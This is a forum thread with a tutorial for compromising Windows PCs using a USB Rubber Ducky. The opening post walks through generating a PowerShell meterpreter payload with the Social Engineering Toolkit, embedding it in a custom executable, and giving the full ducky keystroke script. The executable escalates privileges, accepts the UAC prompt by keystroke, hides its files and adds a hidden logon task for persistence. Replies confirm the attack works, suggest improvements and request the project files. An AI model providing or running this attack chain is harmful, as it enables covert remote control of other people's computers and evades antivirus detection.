chaz Posted February 15, 2017 Share Posted February 15, 2017 Hi there, I'm new to this forum and so I thought I'd introduce myself with a nice tutorial! :) I've created a ducky script and coded an executable which will achieve the title of this topic. This will make use of the twin duck firmware so this is a prerequisite before starting unless you can apply the same thing to ducky-decode or similar. Another prerequisite is .NET framework 4.5 but PC's with Win 8+ will have this by default and loads of applications use this so the likelihood of a PC pre Win 8 not having it is fairly low (I might make a native payload later). What the executable does: - Checks for specific current privileges, e.g. Admin, Admin user group, non privileged user. - Depending on privilege level, either continue execution or attempt to elevate. (- If the user is in the admin user group it will display a normal UAC prompt so the ducky script we use later can hit 'ALT Y') - Copies itself and required DLL's to the default TEMP directory, and sets all of those files to be hidden. - Creates a hidden Task Scheduler task which runs the executable on each user logon. - Executes encoded Powershell payload. Why smart privilege checking is important: If a completely non privileged user was to execute the program and it asked for UAC anyway then a prompt like this would appear: This is obviously problematic, in this circumstance we would rather our payload run with normal privileges because non-privileged access is better than no access right? This is why I have incorporated the privilege escalation into the executable rather than the ducky script so this prompt is never displayed and instead we get a normal user level meterpreter shell. Now if a user is part of the admin group then we see a dialog like this: This is where we'd like our ducky script to hit 'ALT Y' and bam! We can then just use meterpreters 'getsystem' command and we're away! Tutorial: What you'll need: - Windows PC/VM with Visual Studio 2013/2015/2017 installed (free downloads from Microsoft). - Linux based PC/VM for generating our payload/listening for connections. Preferably Kali Linux as we will be using S.E.T (Social Engineering Toolkit) to generate our Powershell payload. - USB Rubber ducky (with Twin Duck or similar firmware installed) - This Visual Studio project: http://www37.zippyshare.com/v/9GYYXKVl/file.html (On your Windows PC/VM, unzip it before) Let's start: - On the Kali Linux side of things lets open S.E.T by going to 'Applications' -> 'Social Engineering Tools' -> 'social engineering toolkit'. - You will be presented with various options, hit '1' and then enter. - Again more options, hit '9' or whichever number corresponds to 'Powershell Attack Vectors' and then enter. - More options, hit '1' and then enter. - Give it your local IP (or external IP if you want a connection from outside your local network, this would require port-forwarding) - Give it a port and then say 'yes' when it asks if you want to start the listener. - Now type this command (change path if necessary): 'sudo php -S 0.0.0.0:80 -t /root/.set/reports/powershell/' - You have just started a webserver on port 80. Navigate over there on your Windows PC's web browser with the file name in the path like so: '192.168.0.XXX/x86_powershell_injection.txt' You should be faced with this screen: - Select all the text and copy it. - Open Visual Studio and click 'Open Project'. Navigate to the 'PSExec' folder that you unzipped and select the Visual Studio solution file: - Go to the line with the pre-inserted Powershell payload (Line 64): - Replace the text within the double quotes with your payload you got from the web server earlier. - Go to the build menu at the top and click 'Build Solution'. Make sure the drop-downs below the menu bar say 'Release' and 'Any CPU', if not just change them. - Navigate to the path it gives at the bottom in the console window to find the DLL's and exe file we need. - Plug in your Ducky's micro SD card into your PC, copy the files called 'PSExec.exe', 'Microsoft.Win32.TaskScheduler.dll' 'JetBrains.Annotations.dll' to your ducky drive. - Now we need our ducky payload, here is the code: REM Awesome script DELAY 500 GUI R DELAY 50 STRING cmd /k "for /f %a in ('wmic logicaldisk get volumename^,name ^| find "DUCKY"') do start "" %a\PSExec.exe" DELAY 50 ENTER DELAY 1500 ALT Y DELAY 1000 STRING exit DELAY 50 ENTER DELAY 50 STRING exit DELAY 50 ENTER - Generate your inject.bin file with an encoder. - Copy the inject.bin to your Ducky's drive and there we have it! Some caveats: - The 'PSExec.exe' file is totally undetected by AntiViruses but if an Anti virus wants to scan the file before running it, it may interfere with the ducky script. - Slower PC's may need slightly longer delays in the ducky script, but hey, just experiment until it works! So tell me what you think, feedback is greatly appreciated! 2 Quote Link to comment Share on other sites More sharing options...
chaz Posted February 16, 2017 Author Share Posted February 16, 2017 I should add, since we are using Windows Task Scheduler, if we do get elevated privileges, when the user reboots and the 'PSExec.exe' file auto runs it will run as Admin and no UAC prompt will be shown because technically when we added the Task we were admin :) Quote Link to comment Share on other sites More sharing options...
ThoughtfulDev Posted February 21, 2017 Share Posted February 21, 2017 The payload works (except i had to change the powershell execution to use Process not the Powershell - because win7 threw a exception right there). I also modified the PSExec a little bit. payload.txt does contain the part after -EncodedCommand so you can swap the payload easily without needing to recompile the PSExec everytime which may not be possible everytime. Thanks nice idea :) It works a exspected you will get Sys Privs easily (except for Win10 which may be a MSF Problem) and the payload stays persistent with SysPrivs after reboot. Nice work ;) 1 Quote Link to comment Share on other sites More sharing options...
chaz Posted February 21, 2017 Author Share Posted February 21, 2017 3 hours ago, Shonenx333 said: The payload works (except i had to change the powershell execution to use Process not the Powershell - because win7 threw a exception right there). I also modified the PSExec a little bit. payload.txt does contain the part after -EncodedCommand so you can swap the payload easily without needing to recompile the PSExec everytime which may not be possible everytime. Thanks nice idea :) It works a exspected you will get Sys Privs easily (except for Win10 which may be a MSF Problem) and the payload stays persistent with SysPrivs after reboot. Nice work ;) Good to hear! Glad you got it working on Windows 7, and yeah having the script as an external resource to load at runtime is probably a better idea! Interestingly I had no issues with System Privs and Windows 10, I just executed 'getsystem' in my meterpreter prompt and I got elevated (even after reboot). Thanks for your kind words :) Quote Link to comment Share on other sites More sharing options...
mrdeep Posted February 22, 2017 Share Posted February 22, 2017 This looks solid. I compiled the program and will try it out on my ducky later! A small pro tip, you need to escape quotation marks if they appear in your script. Like so: pInstance.AddScript("powershell -w 1 -C \"sv SS...." Or it won't compile correctly. Thanks for this. I will update later. Quote Link to comment Share on other sites More sharing options...
chaz Posted February 22, 2017 Author Share Posted February 22, 2017 1 hour ago, mrdeep said: This looks solid. I compiled the program and will try it out on my ducky later! A small pro tip, you need to escape quotation marks if they appear in your script. Like so: pInstance.AddScript("powershell -w 1 -C \"sv SS...." Or it won't compile correctly. Thanks for this. I will update later. Yeah definitely, though all the powershell scripts that I've generated with S.E.T don't have any quotation marks, but for non-programmers, a very good tip! Quote Link to comment Share on other sites More sharing options...
henna3 Posted March 1, 2017 Share Posted March 1, 2017 Everything works except the persistence. Cant get that to work for some reason.. Do you know how to fix this? Nice script though chaz!! Quote Link to comment Share on other sites More sharing options...
chaz Posted March 1, 2017 Author Share Posted March 1, 2017 4 hours ago, henna3 said: Everything works except the persistence. Cant get that to work for some reason.. Do you know how to fix this? Nice script though chaz!! The reboot persistence? I don't mean that if a session dies it will come back to life, it will just execute again when rebooted. If you could check task scheduler to see if a task is created and get back to me that would be awesome! And thanks btw :) Quote Link to comment Share on other sites More sharing options...
chaz Posted March 16, 2017 Author Share Posted March 16, 2017 Hopefully this works for everyone! Quote Link to comment Share on other sites More sharing options...
Thecolorchanges Posted March 17, 2017 Share Posted March 17, 2017 This is awesome! excellent work! Quote Link to comment Share on other sites More sharing options...
qwe3 Posted April 4, 2017 Share Posted April 4, 2017 Sir I have tried this payload on my computer Can I please know how to remove the persistence? Thanks! Quote Link to comment Share on other sites More sharing options...
ThoughtfulDev Posted April 4, 2017 Share Posted April 4, 2017 27 minutes ago, qwe3 said: Sir I have tried this payload on my computer Can I please know how to remove the persistence? Thanks! Go to Windows Task Schedulre and delete the Task "Update" Quote Link to comment Share on other sites More sharing options...
qwe3 Posted April 7, 2017 Share Posted April 7, 2017 Thanks sir There's one problem After the PSExec.exe has started, it says the windows powershell stop working. Output: 1>------ Build started: Project: PSExec, Configuration: Release Any CPU ------ 1>C:\Program Files (x86)\MSBuild\12.0\bin\Microsoft.Common.CurrentVersion.targets(1697,5): warning MSB3088: Could not read state file "obj\Release\PSExec.csprojResolveAssemblyReference.cache". Unable to find assembly 'Microsoft.Build.Tasks.Core, Version=14.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a'. 1> PSExec -> C:\Users\xxx\Desktop\PSExec\PSExec\bin\Release\PSExec.exe ========== Build: 1 succeeded, 0 failed, 0 up-to-date, 0 skipped ========== Quote Link to comment Share on other sites More sharing options...
dacrydium Posted October 16, 2017 Share Posted October 16, 2017 Hi , Thank you for this project, but the link for the visual project is dead , can you reupload it please ? Quote Link to comment Share on other sites More sharing options...
n27 Posted October 17, 2017 Share Posted October 17, 2017 On 10/16/2017 at 9:43 AM, dacrydium said: Hi , Thank you for this project, but the link for the visual project is dead , can you reupload it please ? q8 Quote Link to comment Share on other sites More sharing options...
ThoughtfulDev Posted October 27, 2017 Share Posted October 27, 2017 I dont have the original one just my modified version from PyDuckGen: Click 2 Quote Link to comment Share on other sites More sharing options...
The Modern Mind Posted April 6, 2018 Share Posted April 6, 2018 I can successfully compile the project using the instructions above. It outputs the file PSExec.exec successfully, yet it doesn't output the files Microsoft.Win32.TaskScheduler.dll and JetBrains.Annotations.dll. Shouldn't they be in the same folder as the newly made PSExec? Anybody still using this method that can help? Quote Link to comment Share on other sites More sharing options...
Recommended Posts
Join the conversation
You can post now and register later. If you have an account, sign in now to post with your account.